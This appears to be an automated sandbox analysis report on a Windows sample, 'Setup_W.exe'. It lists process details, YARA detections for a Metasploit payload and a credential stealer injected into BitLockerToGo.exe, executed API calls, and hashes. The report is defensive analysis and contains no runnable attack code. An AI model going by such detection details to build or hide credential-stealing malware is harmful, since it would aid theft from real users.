2024-12-24 01:57:01 UTC	1139	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:57:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=94lipru1k41sklam4m5ji6b661; expires=Fri, 18 Apr 2025 19:43:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BKlwTx%2FHlPTr1vrNhtmrJAD2mXbAch3q6KzrzUZ%2BjZCcZ2AynU2O4yb%2Fr4bNLdIVN%2Bws6DIvN%2BDe7Hfr6Tb5nv9lcHwjp0Y5s2mpGB3y9TU0Th%2Fz3THYmyiUL%2FPaBTmYGtqW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cfa2c2d6b4333-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1605&rtt_var=627&sent=308&recv=573&lost=0&retrans=0&sent_bytes=2841&recv_bytes=553910&delivery_rate=1819314&cwnd=248&unsent_bytes=0&cid=efb9094a1da34245&ts=9984&x=0"

Target ID:	0
Start time:	20:56:04
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\Setup_W.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup_W.exe"
Imagebase:	0x990000
File size:	32'077'826 bytes
MD5 hash:	BCB408AAD4A09A615ECAAB20C8016C3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2014689557.000000000A100000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:56:28
Start date:	23/12/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x510000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2145451743.00000000032DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2145593469.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.7%
Total number of Nodes:	1699
Total number of Limit Nodes:	33

Executed Functions

Function 64608848 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 378
windowregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 64608876
SystemParametersInfoW.USER32 ref: 6460889A
GetProcAddress.KERNEL32 ref: 646088D8
ShowWindow.USER32 ref: 64608EDC
RegisterDeviceNotificationW.USER32 ref: 64608F21
PeekMessageW.USER32 ref: 64608F56
TranslateMessage.USER32 ref: 64608F69
DispatchMessageW.USER32(00000000), ref: 64608F76

Strings

<;cd, xrefs: 64608AE2
0;cd, xrefs: 6460885F
$0cd, xrefs: 64608F93
, xrefs: 64608EF5

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Message$AddressCallbackDeviceDispatchDispatcherInfoNotificationParametersPeekProcRegisterShowSystemTranslateUserWindow
String ID: $$0cd$0;cd$<;cd
API String ID: 492125495-2933605525
Opcode ID: d6ccfd26f1ffe45069021f70fcd627825fc26292ea915f0df43bdb35d03f3396
Instruction ID: 1631ad54a60ab0754004a945e7f3dbe07b8806c8f3d5c1b253d8a438647a4c41
Opcode Fuzzy Hash: d6ccfd26f1ffe45069021f70fcd627825fc26292ea915f0df43bdb35d03f3396
Instruction Fuzzy Hash: 560233B050D380DFDB26DF66C98875ABBF4FB56708F00A81DE4898B650D7B58888CF56

Function 6460496F Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 330
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcspn.MSVCRT ref: 646049D8
strcspn.MSVCRT ref: 64604C2E
strcspn.MSVCRT ref: 64604C82
strlen.MSVCRT ref: 64604CD9
strncmp.MSVCRT ref: 64604CF1
strcspn.MSVCRT ref: 64604E3D
strspn.MSVCRT ref: 64604E55
strtoul.MSVCRT ref: 64604F5C

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Strings

,, xrefs: 64604C51
,, xrefs: 64604C8C

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: strcspn$callocstrcpystrlenstrncmpstrspnstrtoul
String ID: ,$,
API String ID: 1884079115-220654547
Opcode ID: 25bc4c535642e7489e7812ab0660e2ad26dbdeeb91398133799e6bb0e79760f3
Instruction ID: 4e2591ca80fda431e89cdfa17fb7706cfdf5ffbd0de9d582056cb6620bd4d30f
Opcode Fuzzy Hash: 25bc4c535642e7489e7812ab0660e2ad26dbdeeb91398133799e6bb0e79760f3
Instruction Fuzzy Hash: 06F14EB0D097698FDB25CF24CE807CABBF5EB66705F0095EAC448A7245E7719A88CF41

Function 6460C519 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 297
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 6460C5E4
CreateWindowExW.USER32 ref: 6460C63F
free.MSVCRT ref: 6460C657

Part of subcall function 6460A6A5: EnumDisplaySettingsExW.USER32 ref: 6460A6EE

Part of subcall function 6460A79F: EnumDisplaySettingsW.USER32 ref: 6460A7DC

SetPropW.USER32 ref: 6460C690

Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765

ChangeWindowMessageFilterEx.USER32 ref: 6460C6DA
ChangeWindowMessageFilterEx.USER32 ref: 6460C704
ChangeWindowMessageFilterEx.USER32 ref: 6460C72E
GetDpiForWindow.USER32(00000000), ref: 6460C81B
AdjustWindowRectEx.USER32(00000000,00000000), ref: 6460C85F

Part of subcall function 6460B89F: CreateRectRgn.GDI32(00000000), ref: 6460B90B
Part of subcall function 6460B89F: GetWindowLongW.USER32 ref: 6460B95B
Part of subcall function 6460B89F: SetWindowLongW.USER32 ref: 6460B97D
Part of subcall function 6460B89F: SetLayeredWindowAttributes.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6460B9A7
Part of subcall function 6460B89F: DeleteObject.GDI32 ref: 6460B9B3

GetWindowPlacement.USER32 ref: 6460C87E
SetWindowPlacement.USER32 ref: 6460C8A4
DragAcceptFiles.SHELL32 ref: 6460C8BD

Strings

,, xrefs: 6460C76F
`, xrefs: 6460C59F
I, xrefs: 6460C71D

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Window$ChangeConditionFilterMaskMessage$CreateDisplayEnumLongPlacementRectSettings$AcceptAdjustAttributesDeleteDragFilesHandleInfoLayeredModuleObjectPropVerifyVersionfree
String ID: ,$I$`
API String ID: 131436255-777141184
Opcode ID: 0cb9c5bf2eeb64f56a6cd0c7beb129aca32bfc4b4948cbd305c90c412df7d815
Instruction ID: 4fcba12949c450f94256104e9e972d34c8d011c993fabe472bf4f4fe60441ba9
Opcode Fuzzy Hash: 0cb9c5bf2eeb64f56a6cd0c7beb129aca32bfc4b4948cbd305c90c412df7d815
Instruction Fuzzy Hash: 9FD1B0B4A083059FEB04EFA9C68479EBBF4FF89704F00C829E8999B245D7759845CF52

Function 6460998C Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.MSVCRT ref: 64609A9E

Strings

XInput Dance Pad, xrefs: 64609ABF
XInput Flight Stick, xrefs: 64609AB5
XInput Wheel, xrefs: 64609AFD
Xbox Controller, xrefs: 64609AE6
XInput Guitar, xrefs: 64609AC9
Unknown XInput Device, xrefs: 64609AF3
XInput Drum Kit, xrefs: 64609AD3
Wireless Xbox Controller, xrefs: 64609AE1
XInput Arcade Stick, xrefs: 646099CA

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: sprintf
String ID: Unknown XInput Device$Wireless Xbox Controller$XInput Arcade Stick$XInput Dance Pad$XInput Drum Kit$XInput Flight Stick$XInput Guitar$XInput Wheel$Xbox Controller
API String ID: 590974362-1077793288
Opcode ID: d513b2141bc3ad312d71be5418f76d33285190a4b7cae771f26ec3d63cd6f96f
Instruction ID: 804f39a0cce51d99c337eb1727c2d52fc43592905ec737388b680bb4227ce87a
Opcode Fuzzy Hash: d513b2141bc3ad312d71be5418f76d33285190a4b7cae771f26ec3d63cd6f96f
Instruction Fuzzy Hash: 61313AB0A0C394DFD709AF69C68439ABFE2EB51B4CF05D82DE4949B284D775C488CB42

Function 6460309B Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`0ad, xrefs: 64603126
@Jcd, xrefs: 6460311E
@0ad, xrefs: 646030C4
$0cd, xrefs: 646030CD
0cd, xrefs: 646030B8

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID:
String ID: 0cd$$0cd$@0ad$@Jcd$`0ad
API String ID: 0-1914348268
Opcode ID: 1bd3d9c5e908754d6cf1e74d1230158fa814d11c3498cb25bf0402f2b0ec90f1
Instruction ID: 9be3b192a5a6e4199c112d2803d7f13388fb0735954f6ca832e5783398968a45
Opcode Fuzzy Hash: 1bd3d9c5e908754d6cf1e74d1230158fa814d11c3498cb25bf0402f2b0ec90f1
Instruction Fuzzy Hash: 4311866160839087FB09AF66C74071AB598AB62A56F05D03DD9458BB40EB72C8C4C757

Function 6460BC57 Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RemovePropW.USER32 ref: 6460BCA4
DestroyWindow.USER32 ref: 6460BCB5
DestroyIcon.USER32(?,?,?,?,6460EC4B,00000001,64633B20,?,64602D7A), ref: 6460BCD3
DestroyIcon.USER32(?,?,?,?,6460EC4B,00000001,64633B20,?,64602D7A), ref: 6460BCE7

Part of subcall function 6460B80C: SetThreadExecutionState.KERNEL32 ref: 6460B82C
Part of subcall function 6460B80C: SystemParametersInfoW.USER32 ref: 6460B873

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Destroy$Icon$ExecutionInfoParametersPropRemoveStateSystemThreadWindow
String ID:
API String ID: 1815938153-0
Opcode ID: d7b234f1f98a1b0dd1aaf22ca65479dfced2ab44939d0e5755922a7d14ec9752
Instruction ID: ef17fc05eb6e287ab9b56e4bfc9850124767209affbb755ce7ea69302aa2200f
Opcode Fuzzy Hash: d7b234f1f98a1b0dd1aaf22ca65479dfced2ab44939d0e5755922a7d14ec9752
Instruction Fuzzy Hash: 981109B0208245DFDF55AFA5C9C8B597BE8EF05A41F00987CE895CB246DB74D440CB21

Function 6460EC78 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

calloc.MSVCRT ref: 6460EDBA
glfwDestroyWindow.GLFW.4281411633 ref: 6460EE9E

Strings

00cd, xrefs: 6460ED3D

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: DestroyWindow.callocglfw
String ID: 00cd
API String ID: 443364576-4044054280
Opcode ID: 07d9f19076beabb2907ae6ff3bec3432acb4300f844c70ff2a8576bc708936d2
Instruction ID: dd3ab8de1e64792acb9e15d1505939a65c139ece9168a58cb7d13142409f8cd5
Opcode Fuzzy Hash: 07d9f19076beabb2907ae6ff3bec3432acb4300f844c70ff2a8576bc708936d2
Instruction Fuzzy Hash: D16117B0904B648FE726DF19C68438ABBF4FF45B14F00895EE89997790D375AA80CF42

Function 6460EBE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

glfwMakeContextCurrent.GLFW.4281411633(00000001,64633B20,?,64602D7A,?,?,00000001,64613040,64633024,?,646030E9), ref: 6460EC3E

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Strings

3cd, xrefs: 6460EC50

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ContextCurrent.Makecallocglfwstrcpy
String ID: 3cd
API String ID: 1788468011-159238042
Opcode ID: 2304726388e96dead50c1d61f080e64d457ad7172f610e80862ece414da8d9a7
Instruction ID: 03198bbc303c97b6376e433ddd5c4f80c2fcef52d2c33b9efc15072323d32dc3
Opcode Fuzzy Hash: 2304726388e96dead50c1d61f080e64d457ad7172f610e80862ece414da8d9a7
Instruction Fuzzy Hash: E801F7B17083408FE709AF58C2C039977E1EB55B19F00C46AD9A88F341D77788C19797

Function 64609B0E Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,64633B3C,?,64608F89), ref: 64609B2B

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: HandleModulecallocstrcpy
String ID:
API String ID: 201297998-0
Opcode ID: fd2d56a074e933bbdbfcf0366e7dd8147be3146eb1afee0157ecf2b77bf12438
Instruction ID: 45fb95450c7f613d8c139586dc322b620b14055cfca3123252664d532c9aa62d
Opcode Fuzzy Hash: fd2d56a074e933bbdbfcf0366e7dd8147be3146eb1afee0157ecf2b77bf12438
Instruction Fuzzy Hash: F1F034B0508381DBDB06AF26D24978BBBE4EB55B88F00D91CE4D507240D3B5C488CB62

Non-executed Functions

Function 646053ED Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 6460E3DA
GetClipboardData.USER32 ref: 6460E402
CloseClipboard.USER32 ref: 6460E429

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Strings

?!cd, xrefs: 6460E415

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Clipboard$ByteCharCloseDataErrorFormatLastMessageMultiOpenWide
String ID: ?!cd
API String ID: 3814655098-3029108249
Opcode ID: 3e00b10a35443fd6316c3cfce3fa4d2224ac93d0c0fa08c9f8415aeea459148c
Instruction ID: 1e3a5640424b765a1ace3aa08e8c3faaab073590e9099d1ebd5dcc15657c0ed4
Opcode Fuzzy Hash: 3e00b10a35443fd6316c3cfce3fa4d2224ac93d0c0fa08c9f8415aeea459148c
Instruction Fuzzy Hash: F7216DB060C350DBD7167FA9CA8479EBBE8FB56B55F01942CE5C5C3200D7B498848BA7

Function 64605394 Relevance: 10.6, APIs: 7, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 6460E2F4
GlobalLock.KERNEL32 ref: 6460E31E
GlobalFree.KERNEL32(00000000), ref: 6460E392

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Global$AllocByteCharErrorFormatFreeLastLockMessageMultiWide
String ID:
API String ID: 3453243994-0
Opcode ID: 73381ce7e260493f79de8631a67482dc099fa0e6a5317d035ac0943809c6ed9a
Instruction ID: 1af1f2522bf29651f8543d3c7fd93ad5ccf7bd5a95a5199db3afa89fa8dc33f2
Opcode Fuzzy Hash: 73381ce7e260493f79de8631a67482dc099fa0e6a5317d035ac0943809c6ed9a
Instruction Fuzzy Hash: 85416AB0508341EFDB05AF6ACA4839EBFF4FB45761F00C92DE8888B240D3748484CBA2

Function 6460B019 Relevance: 10.6, APIs: 7, Instructions: 53keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 6460B02F
GetKeyState.USER32 ref: 6460B03F
GetKeyState.USER32 ref: 6460B051
GetKeyState.USER32 ref: 6460B063
GetKeyState.USER32 ref: 6460B06F
GetKeyState.USER32 ref: 6460B081
GetKeyState.USER32 ref: 6460B092

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: 847e3df588da540dcf1b59635b2408ac9f6daf5b5d297e9ac9d3c2577dec495a
Instruction ID: 864026d1cb7c078cbe1523b34db08e4da42a9e532c9b22f97af7a2e5f9ad4f50
Opcode Fuzzy Hash: 847e3df588da540dcf1b59635b2408ac9f6daf5b5d297e9ac9d3c2577dec495a
Instruction Fuzzy Hash: EC0167B59043595EEB247BDACD447AFBEB8DF41BA4F41842EDAD413241C7B91040DAB2

